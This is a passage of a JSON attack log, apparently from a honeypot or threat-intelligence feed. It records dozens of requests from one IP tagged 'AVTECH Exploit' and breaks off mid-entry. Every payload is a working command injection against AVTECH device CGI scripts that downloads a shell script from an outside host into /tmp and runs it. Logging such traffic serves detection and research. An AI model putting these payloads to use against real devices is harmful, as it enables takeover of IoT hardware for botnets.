2787.       "event_id": "023519dbb6039fb9cb00696a8ca354c73e57e02066c001795222223df758af85",
2788.       "source_ip_address": "193.142.146.34",
2789.       "country": "NL",
2790.       "user_agent": "Snickers-Avtech",
2791.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
2792.       "post_data": "",
2793.       "target_port": 8112,
2794.       "protocol": "tcp",
2795.       "tags": [
2796.         {
2797.           "cve": "",
2798.           "category": "IoT",
2799.           "description": "AVTECH Exploit"
2800.         }
2801.       ],
2802.       "event_count": 4,
2803.       "first_seen": "2020-06-01T05:05:51Z",
2804.       "last_seen": "2020-06-01T05:27:30Z"
2805.     },
2806.     {
2807.       "event_id": "50d1de65c30df4b9776f2f54c965104789f8bca90d4da79dd5d0985c047a5761",
2808.       "source_ip_address": "193.142.146.34",
2809.       "country": "NL",
2810.       "user_agent": "Snickers-Avtech",
2811.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
2812.       "post_data": "",
2813.       "target_port": 60001,
2814.       "protocol": "tcp",
2815.       "tags": [
2816.         {
2817.           "cve": "",
2818.           "category": "IoT",
2819.           "description": "AVTECH Exploit"
2820.         }
2821.       ],
2822.       "event_count": 3,
2823.       "first_seen": "2020-06-01T05:16:23Z",
2824.       "last_seen": "2020-06-01T05:27:26Z"
2825.     },
2826.     {
2827.       "event_id": "4b3f109d910c9a29ffa3633fb41659a61781c942e179b55880ff1336e21a5874",
2828.       "source_ip_address": "193.142.146.34",
2829.       "country": "NL",
2830.       "user_agent": "Snickers-Avtech",
2831.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
2832.       "post_data": "",
2833.       "target_port": 8112,
2834.       "protocol": "tcp",
2835.       "tags": [
2836.         {
2837.           "cve": "",
2838.           "category": "IoT",
2839.           "description": "AVTECH Exploit"
2840.         }
2841.       ],
2842.       "event_count": 4,
2843.       "first_seen": "2020-06-01T05:05:44Z",
2844.       "last_seen": "2020-06-01T05:27:23Z"
2845.     },
2846.     {
2847.       "event_id": "5ac2312b79a756ccfd56810ab7095de67db75f9c7d3c2633e1deba6502171983",
2848.       "source_ip_address": "193.142.146.34",
2849.       "country": "NL",
2850.       "user_agent": "Snickers-Avtech",
2851.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
2852.       "post_data": "",
2853.       "target_port": 84,
2854.       "protocol": "tcp",
2855.       "tags": [
2856.         {
2857.           "cve": "",
2858.           "category": "IoT",
2859.           "description": "AVTECH Exploit"
2860.         }
2861.       ],
2862.       "event_count": 2,
2863.       "first_seen": "2020-06-01T05:16:46Z",
2864.       "last_seen": "2020-06-01T05:27:16Z"
2865.     },
2866.     {
2867.       "event_id": "4b714eea55b58679ceda9614254932f88e1707c9256f74f395d273fe34f2f901",
2868.       "source_ip_address": "193.142.146.34",
2869.       "country": "NL",
2870.       "user_agent": "Snickers-Avtech",
2871.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
2872.       "post_data": "",
2873.       "target_port": 84,
2874.       "protocol": "tcp",
2875.       "tags": [
2876.         {
2877.           "cve": "",
2878.           "category": "IoT",
2879.           "description": "AVTECH Exploit"
2880.         }
2881.       ],
2882.       "event_count": 2,
2883.       "first_seen": "2020-06-01T05:16:37Z",
2884.       "last_seen": "2020-06-01T05:27:11Z"
2885.     },
2886.     {
2887.       "event_id": "a657a96293e5435ab7829ab3e05c32c6cdb918684ac88ed99a9ce387b828b320",
2888.       "source_ip_address": "193.142.146.34",
2889.       "country": "NL",
2890.       "user_agent": "Snickers-Avtech",
2891.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
2892.       "post_data": "",
2893.       "target_port": 5555,
2894.       "protocol": "tcp",
2895.       "tags": [
2896.         {
2897.           "cve": "",
2898.           "category": "IoT",
2899.           "description": "AVTECH Exploit"
2900.         }
2901.       ],
2902.       "event_count": 3,
2903.       "first_seen": "2020-06-01T05:02:33Z",
2904.       "last_seen": "2020-06-01T05:27:09Z"
2905.     },
2906.     {
2907.       "event_id": "b9ef461f02b380dbb39f88ca01fd1c8184ec7b350203972f431e2b3efed3645a",
2908.       "source_ip_address": "193.142.146.34",
2909.       "country": "NL",
2910.       "user_agent": "Snickers-Avtech",
2911.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
2912.       "post_data": "",
2913.       "target_port": 5555,
2914.       "protocol": "tcp",
2915.       "tags": [
2916.         {
2917.           "cve": "",
2918.           "category": "IoT",
2919.           "description": "AVTECH Exploit"
2920.         }
2921.       ],
2922.       "event_count": 3,
2923.       "first_seen": "2020-06-01T05:02:25Z",
2924.       "last_seen": "2020-06-01T05:27:03Z"
2925.     },
2926.     {
2927.       "event_id": "963bb318fe67967ec96af0b628927bccd1cdba2e045088218a1ae412e7d0b3ea",
2928.       "source_ip_address": "193.142.146.34",
2929.       "country": "NL",
2930.       "user_agent": "Snickers-Avtech",
2931.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
2932.       "post_data": "",
2933.       "target_port": 2082,
2934.       "protocol": "tcp",
2935.       "tags": [
2936.         {
2937.           "cve": "",
2938.           "category": "IoT",
2939.           "description": "AVTECH Exploit"
2940.         }
2941.       ],
2942.       "event_count": 3,
2943.       "first_seen": "2020-06-01T05:02:04Z",
2944.       "last_seen": "2020-06-01T05:26:57Z"
2945.     },
2946.     {
2947.       "event_id": "09aac9ae166c5ee3a275e5e64a3737f0c443c030561417a838751928d16499be",
2948.       "source_ip_address": "193.142.146.34",
2949.       "country": "NL",
2950.       "user_agent": "Snickers-Avtech",
2951.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
2952.       "post_data": "",
2953.       "target_port": 2082,
2954.       "protocol": "tcp",
2955.       "tags": [
2956.         {
2957.           "cve": "",
2958.           "category": "IoT",
2959.           "description": "AVTECH Exploit"
2960.         }
2961.       ],
2962.       "event_count": 3,
2963.       "first_seen": "2020-06-01T05:01:56Z",
2964.       "last_seen": "2020-06-01T05:26:51Z"
2965.     },
2966.     {
2967.       "event_id": "7582f18c197f0b12cd74e827925de8a3bc8feccd0868a75125ec4c2f8d279a79",
2968.       "source_ip_address": "193.142.146.34",
2969.       "country": "NL",
2970.       "user_agent": "Snickers-Avtech",
2971.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
2972.       "post_data": "",
2973.       "target_port": 1400,
2974.       "protocol": "tcp",
2975.       "tags": [
2976.         {
2977.           "cve": "",
2978.           "category": "IoT",
2979.           "description": "AVTECH Exploit"
2980.         }
2981.       ],
2982.       "event_count": 4,
2983.       "first_seen": "2020-06-01T05:17:47Z",
2984.       "last_seen": "2020-06-01T05:26:46Z"
2985.     },
2986.     {
2987.       "event_id": "a2be4531ef6a428d665397cc52c1a8b7a6c2b8b45e9d9654d6103634181bd875",
2988.       "source_ip_address": "193.142.146.34",
2989.       "country": "NL",
2990.       "user_agent": "Snickers-Avtech",
2991.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
2992.       "post_data": "",
2993.       "target_port": 1400,
2994.       "protocol": "tcp",
2995.       "tags": [
2996.         {
2997.           "cve": "",
2998.           "category": "IoT",
2999.           "description": "AVTECH Exploit"
3000.         }
3001.       ],
3002.       "event_count": 4,
3003.       "first_seen": "2020-06-01T05:17:40Z",
3004.       "last_seen": "2020-06-01T05:26:39Z"
3005.     },
3006.     {
3007.       "event_id": "80f9f2bc7b1565b90b541e4e003e5293195903ab9ce7e64ac7d6d0a32daa5484",
3008.       "source_ip_address": "193.142.146.34",
3009.       "country": "NL",
3010.       "user_agent": "Snickers-Avtech",
3011.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3012.       "post_data": "",
3013.       "target_port": 8081,
3014.       "protocol": "tcp",
3015.       "tags": [
3016.         {
3017.           "cve": "",
3018.           "category": "IoT",
3019.           "description": "AVTECH Exploit"
3020.         }
3021.       ],
3022.       "event_count": 5,
3023.       "first_seen": "2020-06-01T05:09:21Z",
3024.       "last_seen": "2020-06-01T05:26:37Z"
3025.     },
3026.     {
3027.       "event_id": "6c07f39e7d574bdaf0b0194fb6cc295560ba355117a5d8d8cffdbc1a572ecc0e",
3028.       "source_ip_address": "193.142.146.34",
3029.       "country": "NL",
3030.       "user_agent": "Snickers-Avtech",
3031.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
3032.       "post_data": "",
3033.       "target_port": 8081,
3034.       "protocol": "tcp",
3035.       "tags": [
3036.         {
3037.           "cve": "",
3038.           "category": "IoT",
3039.           "description": "AVTECH Exploit"
3040.         }
3041.       ],
3042.       "event_count": 5,
3043.       "first_seen": "2020-06-01T05:09:13Z",
3044.       "last_seen": "2020-06-01T05:26:32Z"
3045.     },
3046.     {
3047.       "event_id": "01f668ca735fa9b3585f7f3f60c54e8384067dccd31d2adc2128b8ff56558377",
3048.       "source_ip_address": "193.142.146.34",
3049.       "country": "NL",
3050.       "user_agent": "Snickers-Avtech",
3051.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3052.       "post_data": "",
3053.       "target_port": 9090,
3054.       "protocol": "tcp",
3055.       "tags": [
3056.         {
3057.           "cve": "",
3058.           "category": "IoT",
3059.           "description": "AVTECH Exploit"
3060.         }
3061.       ],
3062.       "event_count": 3,
3063.       "first_seen": "2020-06-01T05:05:48Z",
3064.       "last_seen": "2020-06-01T05:24:45Z"
3065.     },
3066.     {
3067.       "event_id": "04859e9632f8d3a1bcd2f0b4e002c0af091f6f158c8998ddbf2ef9300304d177",
3068.       "source_ip_address": "193.142.146.34",
3069.       "country": "NL",
3070.       "user_agent": "Snickers-Avtech",
3071.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
3072.       "post_data": "",
3073.       "target_port": 9090,
3074.       "protocol": "tcp",
3075.       "tags": [
3076.         {
3077.           "cve": "",
3078.           "category": "IoT",
3079.           "description": "AVTECH Exploit"
3080.         }
3081.       ],
3082.       "event_count": 3,
3083.       "first_seen": "2020-06-01T05:05:42Z",
3084.       "last_seen": "2020-06-01T05:24:38Z"
3085.     },
3086.     {
3087.       "event_id": "c301ad57b5709682dc90c91b47325e11eedcbf72b3ceaf304d317fab99742625",
3088.       "source_ip_address": "193.142.146.34",
3089.       "country": "NL",
3090.       "user_agent": "Snickers-Avtech",
3091.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3092.       "post_data": "",
3093.       "target_port": 88,
3094.       "protocol": "tcp",
3095.       "tags": [
3096.         {
3097.           "cve": "",
3098.           "category": "IoT",
3099.           "description": "AVTECH Exploit"
3100.         }
3101.       ],
3102.       "event_count": 4,
3103.       "first_seen": "2020-06-01T05:12:04Z",
3104.       "last_seen": "2020-06-01T05:24:31Z"
3105.     },
3106.     {
3107.       "event_id": "ed579cd9a2eb376ae4062ab5dbef0cdd2af46b42356b01b9bf47613edc1aa436",
3108.       "source_ip_address": "193.142.146.34",
3109.       "country": "NL",
3110.       "user_agent": "Snickers-Avtech",
3111.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
3112.       "post_data": "",
3113.       "target_port": 88,
3114.       "protocol": "tcp",
3115.       "tags": [
3116.         {
3117.           "cve": "",
3118.           "category": "IoT",
3119.           "description": "AVTECH Exploit"
3120.         }
3121.       ],
3122.       "event_count": 4,
3123.       "first_seen": "2020-06-01T05:11:57Z",
3124.       "last_seen": "2020-06-01T05:24:24Z"
3125.     },
3126.     {
3127.       "event_id": "6ada188b5de68712db1c78d66ecfef9537490e1f1feaf5635f0628e1d3b3e299",
3128.       "source_ip_address": "193.142.146.34",
3129.       "country": "NL",
3130.       "user_agent": "Snickers-Avtech",
3131.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3132.       "post_data": "",
3133.       "target_port": 80,
3134.       "protocol": "tcp",
3135.       "tags": [
3136.         {
3137.           "cve": "",
3138.           "category": "IoT",
3139.           "description": "AVTECH Exploit"
3140.         }
3141.       ],
3142.       "event_count": 5,
3143.       "first_seen": "2020-06-01T05:07:16Z",
3144.       "last_seen": "2020-06-01T05:24:12Z"
3145.     },
3146.     {
3147.       "event_id": "03c38a685839caa2c51e5dd005f9be2f852fb2050d8dffdfed95cce3bbeddd46",
3148.       "source_ip_address": "193.142.146.34",
3149.       "country": "NL",
3150.       "user_agent": "Snickers-Avtech",
3151.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
3152.       "post_data": "",
3153.       "target_port": 80,
3154.       "protocol": "tcp",
3155.       "tags": [
3156.         {
3157.           "cve": "",
3158.           "category": "IoT",
3159.           "description": "AVTECH Exploit"
3160.         }
3161.       ],
3162.       "event_count": 5,
3163.       "first_seen": "2020-06-01T05:07:08Z",
3164.       "last_seen": "2020-06-01T05:24:05Z"
3165.     },
3166.     {
3167.       "event_id": "28ae264b5796605b373875b96aabee4866052b5e2b3f5c659a7377c231b223e5",
3168.       "source_ip_address": "193.142.146.34",
3169.       "country": "NL",
3170.       "user_agent": "Snickers-Avtech",
3171.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3172.       "post_data": "",
3173.       "target_port": 8088,
3174.       "protocol": "tcp",
3175.       "tags": [
3176.         {
3177.           "cve": "",
3178.           "category": "IoT",
3179.           "description": "AVTECH Exploit"
3180.         }
3181.       ],
3182.       "event_count": 3,
3183.       "first_seen": "2020-06-01T05:15:54Z",
3184.       "last_seen": "2020-06-01T05:23:59Z"
3185.     },
3186.     {
3187.       "event_id": "87c2398c4748915b2e02617716dd63f665ba004025743f6ceebe9c3fc83494bc",
3188.       "source_ip_address": "193.142.146.34",
3189.       "country": "NL",
3190.       "user_agent": "Snickers-Avtech",
3191.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
3192.       "post_data": "",
3193.       "target_port": 8088,
3194.       "protocol": "tcp",
3195.       "tags": [
3196.         {
3197.           "cve": "",
3198.           "category": "IoT",
3199.           "description": "AVTECH Exploit"
3200.         }
3201.       ],
3202.       "event_count": 3,
3203.       "first_seen": "2020-06-01T05:15:46Z",
3204.       "last_seen": "2020-06-01T05:23:54Z"
3205.     },
3206.     {
3207.       "event_id": "020af8e0b52276ba7ebf5e15c8c3ed6c759df783fdec1ef46bd7d754fa60411e",
3208.       "source_ip_address": "193.142.146.34",
3209.       "country": "NL",
3210.       "user_agent": "Snickers-Avtech",
3211.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3212.       "post_data": "",
3213.       "target_port": 8181,
3214.       "protocol": "tcp",
3215.       "tags": [
3216.         {
3217.           "cve": "",
3218.           "category": "IoT",
3219.           "description": "AVTECH Exploit"
3220.         }
3221.       ],
3222.       "event_count": 4,
3223.       "first_seen": "2020-06-01T05:04:51Z",
3224.       "last_seen": "2020-06-01T05:23:50Z"
3225.     },
3226.     {
3227.       "event_id": "ebead7e1694bd7056e659d31911e6300e98944dc30be0f37ba151cb3fc37e5cb",
3228.       "source_ip_address": "193.142.146.34",
3229.       "country": "NL",
3230.       "user_agent": "Snickers-Avtech",
3231.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3232.       "post_data": "",
3233.       "target_port": 7547,
3234.       "protocol": "tcp",
3235.       "tags": [
3236.         {
3237.           "cve": "",
3238.           "category": "IoT",
3239.           "description": "AVTECH Exploit"
3240.         }
3241.       ],
3242.       "event_count": 4,
3243.       "first_seen": "2020-06-01T05:01:02Z",
3244.       "last_seen": "2020-06-01T05:23:49Z"
3245.     },
3246.     {
3247.       "event_id": "46b27f2c02c39c3f73456552ea513e13f5cbb0a55e50541e01585f9878cb94ff",
3248.       "source_ip_address": "193.142.146.34",
3249.       "country": "NL",
3250.       "user_agent": "Snickers-Avtech",
3251.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3252.       "post_data": "",
3253.       "target_port": 52869,
3254.       "protocol": "tcp",
3255.       "tags": [
3256.         {
3257.           "cve": "",
3258.           "category": "IoT",
3259.           "description": "AVTECH Exploit"
3260.         }
3261.       ],
3262.       "event_count": 4,
3263.       "first_seen": "2020-06-01T05:07:39Z",
3264.       "last_seen": "2020-06-01T05:23:45Z"
3265.     },
3266.     {
3267.       "event_id": "3eaddae391475b94fa0484ce6aab5ee8e8ce7951578e0d52e728b5cbf23094d7",
3268.       "source_ip_address": "193.142.146.34",
3269.       "country": "NL",
3270.       "user_agent": "Snickers-Avtech",
3271.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
3272.       "post_data": "",
3273.       "target_port": 7547,
3274.       "protocol": "tcp",
3275.       "tags": [
3276.         {
3277.           "cve": "",
3278.           "category": "IoT",
3279.           "description": "AVTECH Exploit"
3280.         }
3281.       ],
3282.       "event_count": 5,
3283.       "first_seen": "2020-06-01T05:00:55Z",
3284.       "last_seen": "2020-06-01T05:23:42Z"
3285.     },
3286.     {
3287.       "event_id": "6c37395a34fba75aff4463e445e3648b0cbf7a481b01dd247a79fd0f00a3ebc1",
3288.       "source_ip_address": "193.142.146.34",
3289.       "country": "NL",
3290.       "user_agent": "Snickers-Avtech",
3291.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
3292.       "post_data": "",
3293.       "target_port": 8181,
3294.       "protocol": "tcp",
3295.       "tags": [
3296.         {
3297.           "cve": "",
3298.           "category": "IoT",
3299.           "description": "AVTECH Exploit"
3300.         }
3301.       ],
3302.       "event_count": 4,
3303.       "first_seen": "2020-06-01T05:04:42Z",
3304.       "last_seen": "2020-06-01T05:23:41Z"
3305.     },
3306.     {
3307.       "event_id": "747d4f5e511bd30a2506c84a1a87c33f234f47a02021f1d4fb19077de5cb02e2",
3308.       "source_ip_address": "193.142.146.34",
3309.       "country": "NL",
3310.       "user_agent": "Snickers-Avtech",
3311.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
3312.       "post_data": "",
3313.       "target_port": 52869,
3314.       "protocol": "tcp",
3315.       "tags": [
3316.         {
3317.           "cve": "",
3318.           "category": "IoT",
3319.           "description": "AVTECH Exploit"
3320.         }
3321.       ],
3322.       "event_count": 4,
3323.       "first_seen": "2020-06-01T05:07:31Z",
3324.       "last_seen": "2020-06-01T05:23:39Z"
3325.     },
3326.     {
3327.       "event_id": "00e8d2b8385580b5bca5638fafd9f3fc35b94c42fa7748f462f888d4cf1882c9",
3328.       "source_ip_address": "193.142.146.34",
3329.       "country": "NL",
3330.       "user_agent": "Snickers-Avtech",
3331.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3332.       "post_data": "",
3333.       "target_port": 37215,
3334.       "protocol": "tcp",
3335.       "tags": [
3336.         {
3337.           "cve": "",
3338.           "category": "IoT",
3339.           "description": "AVTECH Exploit"
3340.         }
3341.       ],
3342.       "event_count": 4,
3343.       "first_seen": "2020-06-01T05:04:20Z",
3344.       "last_seen": "2020-06-01T05:23:33Z"
3345.     },
3346.     {
3347.       "event_id": "c606affa80c2b8ddef48cd617e74b065ae07fb977fba38c4d110ec79fadb6069",
3348.       "source_ip_address": "193.142.146.34",
3349.       "country": "NL",
3350.       "user_agent": "Snickers-Avtech",
3351.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
3352.       "post_data": "",
3353.       "target_port": 37215,
3354.       "protocol": "tcp",
3355.       "tags": [
3356.         {
3357.           "cve": "",
3358.           "category": "IoT",
3359.           "description": "AVTECH Exploit"
3360.         }
3361.       ],
3362.       "event_count": 4,
3363.       "first_seen": "2020-06-01T05:04:12Z",
3364.       "last_seen": "2020-06-01T05:23:26Z"
3365.     },
3366.     {
3367.       "event_id": "7fbecdbb9d459b4aaac226caf3fd458467b9b83a30ff4fee2f82987db6065054",
3368.       "source_ip_address": "193.142.146.34",
3369.       "country": "NL",
3370.       "user_agent": "Snickers-Avtech",
3371.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3372.       "post_data": "",
3373.       "target_port": 10243,
3374.       "protocol": "tcp",
3375.       "tags": [
3376.         {
3377.           "cve": "",
3378.           "category": "IoT",
3379.           "description": "AVTECH Exploit"
3380.         }
3381.       ],
3382.       "event_count": 4,
3383.       "first_seen": "2020-06-01T05:04:11Z",
3384.       "last_seen": "2020-06-01T05:22:26Z"
3385.     },
3386.     {
3387.       "event_id": "ffc701cb1de9b19ccbd7805c07a4cb714c22b55219e9bcbba500b6f4ba1e8cd9",
3388.       "source_ip_address": "193.142.146.34",
3389.       "country": "NL",
3390.       "user_agent": "Snickers-Avtech",
3391.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3392.       "post_data": "",
3393.       "target_port": 5900,
3394.       "protocol": "tcp",
3395.       "tags": [
3396.         {
3397.           "cve": "",
3398.           "category": "IoT",
3399.           "description": "AVTECH Exploit"
3400.         }
3401.       ],
3402.       "event_count": 3,
3403.       "first_seen": "2020-06-01T05:05:22Z",
3404.       "last_seen": "2020-06-01T05:22:24Z"
3405.     },
3406.     {
3407.       "event_id": "ce82e6901c84cecd33d2cea1f4349998078a33d00c6200af90753f6db10f3060",
3408.       "source_ip_address": "193.142.146.34",
3409.       "country": "NL",
3410.       "user_agent": "Snickers-Avtech",
3411.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
3412.       "post_data": "",
3413.       "target_port": 5900,
3414.       "protocol": "tcp",
3415.       "tags": [
3416.         {
3417.           "cve": "",
3418.           "category": "IoT",
3419.           "description": "AVTECH Exploit"
3420.         }
3421.       ],
3422.       "event_count": 3,
3423.       "first_seen": "2020-06-01T05:05:15Z",
3424.       "last_seen": "2020-06-01T05:22:19Z"
3425.     },
3426.     {
3427.       "event_id": "4574bed270dae4dfe5a83cb579751f60336eae9488c762e2b624ecd834a5fb5d",
3428.       "source_ip_address": "193.142.146.34",
3429.       "country": "NL",
3430.       "user_agent": "Snickers-Avtech",
3431.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
3432.       "post_data": "",
3433.       "target_port": 10243,
3434.       "protocol": "tcp",
3435.       "tags": [
3436.         {
3437.           "cve": "",
3438.           "category": "IoT",
3439.           "description": "AVTECH Exploit"
3440.         }
3441.       ],
3442.       "event_count": 4,
3443.       "first_seen": "2020-06-01T05:04:02Z",
3444.       "last_seen": "2020-06-01T05:22:19Z"
3445.     },
3446.     {
3447.       "event_id": "a044141f42fbb8d490df165f14486247799a245f72d22e23470789f3e38aa3d8",
3448.       "source_ip_address": "193.142.146.34",
3449.       "country": "NL",
3450.       "user_agent": "Snickers-Avtech",
